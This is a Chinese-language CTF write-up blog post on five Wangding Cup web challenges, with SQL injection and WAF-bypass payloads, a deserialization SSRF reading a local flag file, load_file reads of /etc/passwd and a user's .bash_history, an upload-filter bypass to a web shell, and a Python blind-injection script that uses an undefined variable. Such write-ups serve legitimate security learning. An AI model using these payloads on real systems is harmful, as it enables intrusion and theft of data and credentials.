<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="fakebookSSRF、SQL报错注入、反序列化 打开页面注册之后，在1处可以跳转到view.php，可以看到 no参数，尝试一下sql注入，用常规的union联合注入可以成功注入，不过用&#x2F;**&#x2F;绕过空格。同时也可以用报错注入：">
<meta property="og:type" content="article">
<meta property="og:title" content="网鼎部分题目复现">
<meta property="og:url" content="http://example.com/2020/10/11/%E7%BD%91%E9%BC%8E%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="My0n9s&#39;blog">
<meta property="og:description" content="fakebookSSRF、SQL报错注入、反序列化 打开页面注册之后，在1处可以跳转到view.php，可以看到 no参数，尝试一下sql注入，用常规的union联合注入可以成功注入，不过用&#x2F;**&#x2F;绕过空格。同时也可以用报错注入：">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/10/11/6tsXLv8qRxwjfI2.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/5zprY7ukOjcFR94.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/rF7RlGzbwfxyP9T.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/iqwonZQc5P9fLez.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/fF9VsmGJQu7Rxoj.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/vwCsgTenW7Gl15j.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/8kJ4dvYL9iUpgoN.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/l362cDWjm41VXEi.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/iINCMubqhSzRnA1.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/6GtPgQE8iz4sOuI.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/WAcjSe7b9TtsRGf.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/s7SN9FIMpdTtPQH.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/QAsSKdftHPyn1GM.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/AHn39KkjtzFyh2P.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/f9cbPJ5XCVABTLe.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/1lQLo7GaXrDdNfv.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/A7soiLRC1HzhfSY.png">
<meta property="og:image" content="https://i.loli.net/2020/10/11/76aB2rREtgOwevh.png">
<meta property="article:published_time" content="2020-10-11T02:23:59.000Z">
<meta property="article:modified_time" content="2024-09-08T04:26:38.000Z">
<meta property="article:author" content="My0n9s">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/10/11/6tsXLv8qRxwjfI2.png">


<link rel="canonical" href="http://example.com/2020/10/11/%E7%BD%91%E9%BC%8E%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2020/10/11/%E7%BD%91%E9%BC%8E%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/","path":"2020/10/11/网鼎部分题目复现/","title":"网鼎部分题目复现"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>网鼎部分题目复现 | My0n9s'blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">My0n9s'blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#fakebook"><span class="nav-number">1.</span> <span class="nav-text">fakebook</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#unfinished"><span class="nav-number">2.</span> <span class="nav-text">unfinished</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#comment"><span class="nav-number">3.</span> <span class="nav-text">comment</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wafupload"><span class="nav-number">4.</span> <span class="nav-text">Wafupload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sqlweb"><span class="nav-number">5.</span> <span class="nav-text">sqlweb</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="My0n9s"
      src="/images/touxiang.jpeg">
  <p class="site-author-name" itemprop="name">My0n9s</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">95</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">28</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/10/11/%E7%BD%91%E9%BC%8E%E9%83%A8%E5%88%86%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpeg">
      <meta itemprop="name" content="My0n9s">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="My0n9s'blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="网鼎部分题目复现 | My0n9s'blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          网鼎部分题目复现
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2020-10-11 10:23:59" itemprop="dateCreated datePublished" datetime="2020-10-11T10:23:59+08:00">2020-10-11</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2024-09-08 12:26:38" itemprop="dateModified" datetime="2024-09-08T12:26:38+08:00">2024-09-08</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Web/" itemprop="url" rel="index"><span itemprop="name">Web</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="fakebook"><a href="#fakebook" class="headerlink" title="fakebook"></a>fakebook</h2><p>SSRF、SQL报错注入、反序列化</p>
<p>打开页面注册之后，在1处可以跳转到view.php，可以看到 no参数，尝试一下sql注入，用常规的union联合注入可以成功注入，不过用&#x2F;**&#x2F;绕过空格。同时也可以用报错注入：</p>
<span id="more"></span>

<p><code>updatexml(1,make_set(3,&#39;~&#39;,(select database())),1) </code></p>
<p>依次爆库名 表名 字段名  值</p>
<p>可以发现 data的内容：</p>
<p><code>O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:1:&quot;1&quot;;s:3:&quot;age&quot;;i:1;s:4:&quot;blog&quot;;s:20:&quot;http://www.baidcu.com&quot;;&#125;</code></p>
<p>数据库中是以序列化的形式存在，而最后回显在页面的时候是反序列化之后的，这里我们可以利用这个来触发反序列化漏洞</p>
<p>最后我们构造的payload:</p>
<p><code>/view.php?no=-1/**/union/**/select/**/1,2,3,&#39;O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:4:&quot;test&quot;;s:3:&quot;age&quot;;i:123;s:4:&quot;blog&quot;;s:29:&quot;file:///var/www/html/flag.php&quot;;&#125;&#39;</code></p>
<p>到这里，很多地方我们都是通过猜想和试，比如反序列化，和flag.php的存在</p>
<p>这里通过 robots.txt文件 可以发现部分源码泄露。</p>
<p>这个题目涉及的知识点很多，不是特别难，但是有一点综合性。还有很多细节地方，如果不注意，就写不出来了，比如data数据你构造的时候，在第4列，如果你写在其他地方了，很显然构造不出来。如果是黑盒测试，这个题目还是需要很多猜测和经验的。如果能拿到完整源码，可能做起来会更有目的性一点。SSRF的扩展性利用要了解。</p>
<h2 id="unfinished"><a href="#unfinished" class="headerlink" title="unfinished"></a>unfinished</h2><p>二次注入、数据库里面字符串长度的处理</p>
<p>进行注册之后登陆可以发现，注册时的用户名出现在了左侧：</p>
<p><img src="https://i.loli.net/2020/10/11/6tsXLv8qRxwjfI2.png" alt="1.png"></p>
<p>可以发现 用户名显示在左边，怀疑有二次注入</p>
<p>先更正一个观点，insert into 语句那里是可以执行SQL语句的：</p>
<p><img src="https://i.loli.net/2020/10/11/5zprY7ukOjcFR94.png" alt="2.png"></p>
<p>这里实际上是执行了select database() 然后执行结果再与0相加的。因为我们是要得到database()的结果，而结果一般是字母，字母+数字得出来是数字，所以我们需要转换一下用到hex()</p>
<p><img src="https://i.loli.net/2020/10/11/rF7RlGzbwfxyP9T.png" alt="3.png"></p>
<p>还有一个问题，就是有的字符串经过hex()之后还是会带上字母，这个时候和0相加还是0，就得不到结果了，所以我们可以进行两次hex()，因为两次hex()之后 一定是是纯数字字符串。</p>
<p>然后在这个题目里面需要注意的是，两次hex（）之后，数字是非常长的，所以只能通过截取，每次取10个这样来显示。</p>
<p>试验一下：</p>
<p><img src="https://i.loli.net/2020/10/11/iqwonZQc5P9fLez.png" alt="5.png"></p>
<p>发现是可行的。因为web只有三个字母，两次hex也比较短，所以没有截取</p>
<p>最后附上脚本：</p>
<p><img src="https://i.loli.net/2020/10/11/fF9VsmGJQu7Rxoj.png" alt="6.png"></p>
<p>这里其实是投机取巧了一点，直接猜测表名是flag,并且flag在flag表里面。注意这里用的是 substr(str from digit for digit) 形式，substr(str,digit,digit) 行不通, 逗号被ban 了 。其实可以fuzz一下，到底ban了哪些函数，不知道这个可不可以系统的解（爆库，爆表名，爆字段名）或者盲注。</p>
<h2 id="comment"><a href="#comment" class="headerlink" title="comment"></a>comment</h2><p>git、二次注入、爆破、SQL语句读文件</p>
<p>通过提示发现这个题目有git泄露的（git相关的知识我还不是蛮懂，后面要了解学习），然后拿到这题的主要源代码</p>
<p><img src="https://i.loli.net/2020/10/11/vwCsgTenW7Gl15j.png" alt="1.png"></p>
<p>这个题目注入点在category这里，可以看出来，category一开始写到board表里面，并且对变量进行了转义，（这个不影响二次注入），后来是把board表的category拿出来，然后直接写到comment表里面，并且没有过滤。所以这里存在了二次注入。看一下过程，比如我在board插入的数据是：</p>
<p><img src="https://i.loli.net/2020/10/11/8kJ4dvYL9iUpgoN.png" alt="2.png"></p>
<p>然后我在comment 插入的数据是：</p>
<p><img src="https://i.loli.net/2020/10/11/l362cDWjm41VXEi.png" alt="3.png"></p>
<p>那么在 comment表里，实际上执行的语句是</p>
<p><img src="https://i.loli.net/2020/10/11/iINCMubqhSzRnA1.png" alt="4.png"></p>
<p>注意这里是多行，所以用的是&#x2F;*  *&#x2F;，同时#是用来注释逗号的。最后user()结果存在了content字段里面，并被echo了出来，结果如下：</p>
<p><img src="https://i.loli.net/2020/10/11/6GtPgQE8iz4sOuI.png" alt="5.png"></p>
<p>注入点找到了，基本上可以依靠这个思路爆库爆表爆字段名了。但是这个题目flag不在表里面。所以需要别的方法，这里是通过读取一系列系统的文件来找到flag的存在位置。</p>
<p>先读一下&#x2F;etc&#x2F;passwd文件，这里用到了load_file()函数，payload: ‘,content&#x3D;(select load_file(‘&#x2F;etc&#x2F;passwd’)),&#x2F;*</p>
<p><img src="https://i.loli.net/2020/10/11/WAcjSe7b9TtsRGf.png" alt="6.png"></p>
<p>然后找到：</p>
<p><img src="https://i.loli.net/2020/10/11/s7SN9FIMpdTtPQH.png" alt="7.png"></p>
<p>有一个www用户，可以读它的历史命令文件 payload:’,content&#x3D;(select(load_file(‘&#x2F;home&#x2F;www&#x2F;.bash_history’))),&#x2F;*</p>
<p><img src="https://i.loli.net/2020/10/11/QAsSKdftHPyn1GM.png" alt="8.png"></p>
<p>发现有.DS_Store文件，这个考虑可能是docker环境，可能在&#x2F;tmp&#x2F;html文件下，然后读它。如果直接读：</p>
<p>‘,content&#x3D;(select load_file(‘&#x2F;tmp&#x2F;html&#x2F;.DS_Store’)),&#x2F;* 这个会读出来乱码（可能是浏览器原因，因为有很多不可见字符，而且浏览器也只能显示这么一点东西。。</p>
<p><img src="https://i.loli.net/2020/10/11/AHn39KkjtzFyh2P.png" alt="9.png"></p>
<p>所以用hex转一下，’,content&#x3D;(select hex(load_file(‘&#x2F;tmp&#x2F;html&#x2F;.DS_Store’))),&#x2F;*,然后在解密得到：</p>
<p><img src="https://i.loli.net/2020/10/11/f9cbPJ5XCVABTLe.png" alt="10.png"></p>
<p> 找到flag_8946e1ff1ee3e40f.php文件，然后读这个文件，这里是在 &#x2F;var&#x2F;www&#x2F;html&#x2F;下 </p>
<p>最终的payload: ‘,content&#x3D;(select(load_file(‘&#x2F;var&#x2F;www&#x2F;html&#x2F;flag_8946e1ff1ee3e40f.php’))),&#x2F;*</p>
<p><img src="https://i.loli.net/2020/10/11/1lQLo7GaXrDdNfv.png" alt="11.png"></p>
<p>涉及到SQL注入 比如二次注入，要依实际环境分析，比如这里的注入就很特别，不过我第一步估计就凉了，不懂git拿不到完整源码，这里留一个坑（git和docker）要了解，当sql的库表没有线索时，可以从系统文件找线索，以后实战也是。上次校赛的思路也是。Linux很重要。不得不说，整个题目还是综合性蛮大的。</p>
<h2 id="Wafupload"><a href="#Wafupload" class="headerlink" title="Wafupload"></a>Wafupload</h2><p>没找到复现环境，只能学习一下知识点了。数组访问方式不同造成的漏洞</p>
<p>源代码</p>
<p><img src="https://i.loli.net/2020/10/11/A7soiLRC1HzhfSY.png" alt="1.png"></p>
<p>第8行 对上传文件类型进行了检测，容易bypass, 然后来到13 行，如果filename参数为空，那么$file变量的值等于上传的文件名，如果不为空，则取filename参数的值（filename参数是可控的，然后第14行判断，如果$file不是数组，就把它分成数组，如果是数组，这一步跳过，17行 end()函数 取数组尾项（也就是后缀名，然后18行进行判断，这些其实都没问题，重点就在后面22行，对这个文件进行了重新命名，并且使用了reset()和下标 这两种不同读取数组内容的方式，从而导致了漏洞。</p>
<p>举个例子 ：</p>
<p><img src="https://i.loli.net/2020/10/11/76aB2rREtgOwevh.png" alt="2.png"></p>
<p>reset是指向第一个初始化的区域，这里第一次初始化的是 $hack[1]，所以reset指向它，同理，end()指向最后一个初始化的。而$hack[]这种形式直接根据下标指向，这就可能会造成bug。</p>
<p>回到这个题，如果传参是这样的 filename[1]&#x3D;’php’&amp;filename[0]&#x3D;’jpg’，那么end()就会指向jpg，从而绕过后缀检测，同时重命名的时候 reset()指向php ，$file[count($file)-1] 等效于$file[1]指向php，最后生成的文件名就是 php.php，就可以 getshell了。</p>
<h2 id="sqlweb"><a href="#sqlweb" class="headerlink" title="sqlweb"></a>sqlweb</h2><p>一开始有个登陆界面，这里用弱密码进去了</p>
<p>admin admin123</p>
<p>然后给了提示 only wuyanzu can get the flag，因为是要以username为 wuyanzu的用户来登陆进去，但是我们不知道他的密码</p>
<p>这里给出了waf：</p>
<p><code>/sleep|benchmark|=|like|regexp|and|\|%|substr|union|\s+|group|floor|user|extractvalue|UpdateXml|ord|lpad|rpad|left|&gt;|,|ascii/i  !!! (trust me,no one can bypass it)</code></p>
<p>过滤了很多，这里我们用:</p>
<p><code>wuyanzu&#39;/**/&amp;&amp;/**/mid(passwd/**/from/**/1/**/for/**/1)/**/in(&#39;f&#39;)</code></p>
<p>盲注脚本： 盲注三要素（字典、判断条件、特殊性到一般性的payload)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">url=<span class="string">&quot;xxxx/sql.php&quot;</span></span><br><span class="line">flag=<span class="string">&#x27;&#x27;</span></span><br><span class="line">dicts=string.ascii_letters+string.digits+<span class="string">&#x27;&#123;&#125;&#x27;</span>+<span class="string">&#x27;-&#x27;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">50</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> dicts:</span><br><span class="line">        payload=<span class="string">&quot;wuyanzu&#x27;/**/&amp;&amp;/**/mid(passwd/**/from/**/&#123;&#125;/**/for/**/1)/**/in(&#x27;&#123;&#125;&#x27;)&quot;</span>.<span class="built_in">format</span>(<span class="built_in">int</span>(i),j)</span><br><span class="line">        datas=&#123;<span class="string">&quot;uname&quot;</span>:payload,<span class="string">&quot;passwd&quot;</span>:<span class="number">1</span>,<span class="string">&quot;submit&quot;</span>:<span class="string">&quot;login&quot;</span>&#125;</span><br><span class="line">        r=requests.session()</span><br><span class="line">        respose=r.post(url=url,data=datas)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;passwd&#x27;</span> <span class="keyword">in</span> respose.text:</span><br><span class="line">            flag+=j</span><br><span class="line">            <span class="built_in">print</span>(flag)</span><br><span class="line">            <span class="keyword">if</span> chars == <span class="string">&#x27;&#125;&#x27;</span>:</span><br><span class="line">                exit()</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>

<p>很多时候，不一定全部爆破出来 库 表 字段名 只要拿到关键的就OK了，有时候也是靠猜测。比如这里就是passwd。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/writeup/" rel="tag"># writeup</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/10/11/SUCTF2019Pythonginx/" rel="prev" title="SUCTF2019Pythonginx">
                  <i class="fa fa-angle-left"></i> SUCTF2019Pythonginx
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/10/11/%E8%A5%BF%E6%B9%96%E7%9A%84%E4%B8%A4%E4%B8%AAWeb%E6%95%B4%E7%90%86/" rel="next" title="西湖的两个Web整理">
                  西湖的两个Web整理 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">My0n9s</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
